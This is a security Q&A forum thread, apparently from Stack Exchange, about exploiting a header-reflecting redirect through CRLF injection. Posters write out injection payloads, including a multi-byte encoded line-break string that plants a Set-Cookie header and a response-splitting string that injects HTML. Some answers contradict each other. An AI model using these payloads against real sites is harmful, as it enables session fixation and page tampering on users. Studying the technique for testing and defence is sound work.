# Is it possible to Exploit this Line Feed?

Tags: cookies, injection, response-splitting

During a security assessment on a website I found a a redirection link that was reflecting the values in the Location header. The first thing that came to my mind was CRLF injection so I tried a few variation of `"%0a"` and managed to include my payload in the response:

Request:

```
"https://ads.example.com/promoredir?redirect=http%3A%2F%2Fmain.example.com%2F%E5%98%8A%E5%98%8DSet-Cookie:%20test"
```

Response:

```
HTTP/1.1 302 Moved Temporarily 
Date: Sun, 12 Jul 2015 14:18:41 GMT 
Server: Apache 
Set-Cookie: JSESSIONID=5C24F2C96CE37DAA026591F5CAD91900; Path=/; Secure; HttpOnly 
Location: mail.example.com

Set-Cookie: test

Content-Length: 0 
X-Content-Type-Options: nosniff 
Strict-Transport-Security: max-age=31536000 
Vary: User-Agent 
Connection: close 
Content-Type: text/plain; charset=UTF-8
```

However when I follow the redirection, my request changes to the following:

```
GET /Set-Cookie:%20test" HTTP/1.1
Host: main.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```

Where am I going wrong here?

Comment: Have you tried 0x0D0A instead of 0x0A ?

Comment: Yeah, no luck either.

Comment: So what the hell is "%E5%98%8D%E5%98%8A", could you link to some background information on this extremely obscure attack string?  My guess is this is some kind of advanced multi-byte injection, care to elaborate? (https://hackerone.com/reports/52042)

Comment: Of course, the researcher who designed this string made a great post about it on this link: https://blog.innerht.ml/page/3/

Answer (score 1):

I would try to just do something like this:

`http://www.example.com/somepage.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3E  TEST TEXT %3C/html%3E`

to start with. Then, if you see 2 different responses, and one of them is a 200, and if you see the text, you can then try whatever stuff with cookies.

Comment: %0d and %0a are replace with "space", also the response is still 302 (redirection).

Comment: The only payload that creates a new line is "%E5%98%8A%E5%98%8D"

Comment: An attacker shouldn't need two content-types to exploit this issue. In fact, this may confuse the browser.  Controlling the header and the beginning of the HTML should be sufficient to control the content of the entire page.  I have no idea what micro is referring to about "%E5%98%8A%E5%98%8D",  that must be chinese (literally).

Answer (score 0):

It's impossible to say from your "screenshot" above, but I'd say you're not getting back 0x0D 0x0A after the location, but instead the high bytes you've sent (0x8A 0x8D), including your Set-Cookie.

And you're not interpreting the returned high bytes as CRLF either, so your user agent interprets the Set-Cookie as the non-host-part of the URL.

Try switching the order of CR and LF, and look at a hex dump of the response from the web server.

Answer (score 0):

I think you should send %E5%98%8D%E5%98%8A, not %E5%98%8A%E5%98%8D. Otherwise both tokens get expanded and you probably end up with an extra newline.

On the other hand, the extra newline apparently is not interpreted at all, so I'm wondering if your exploit is indeed working, or whether you're seeing your own payload echoed back harmlessly to you and *then* interpreted as a spurious newline.

I.e., you send

```
location=(...omitted...)%E5%98%8A%E5%98%8D(...)cookie%20test
```

and the server echoes back *a single line*

```
Location: (same as above)
```

and *this* is why your browser sends that GET. You *appear* to see a newline in your response because the single line above gets interpreted as two lines by your terminal.

Comment: Could you provide a link to explain `%E5%98%8D%E5%98%8A`?

Comment: Of course, the researcher who designed this string made a great post about it on this link: blog.innerht.ml/page/3

Answer (score 0):

I have tried hard on same kind of bug you are talking about. But the same problem that I'm facing is, You can easily inject a cookie or Set-Cookie but Can't exploit further such as XSS, Content Injection etc. You can inject HTML content on 302 Redirection page but It doesn't make sense because very next you will get redirected to page.

In this case only %E5%98%8D%E5%98%8A will work for injecting cookie. Also as I guess you can't split the response header in two working response headers.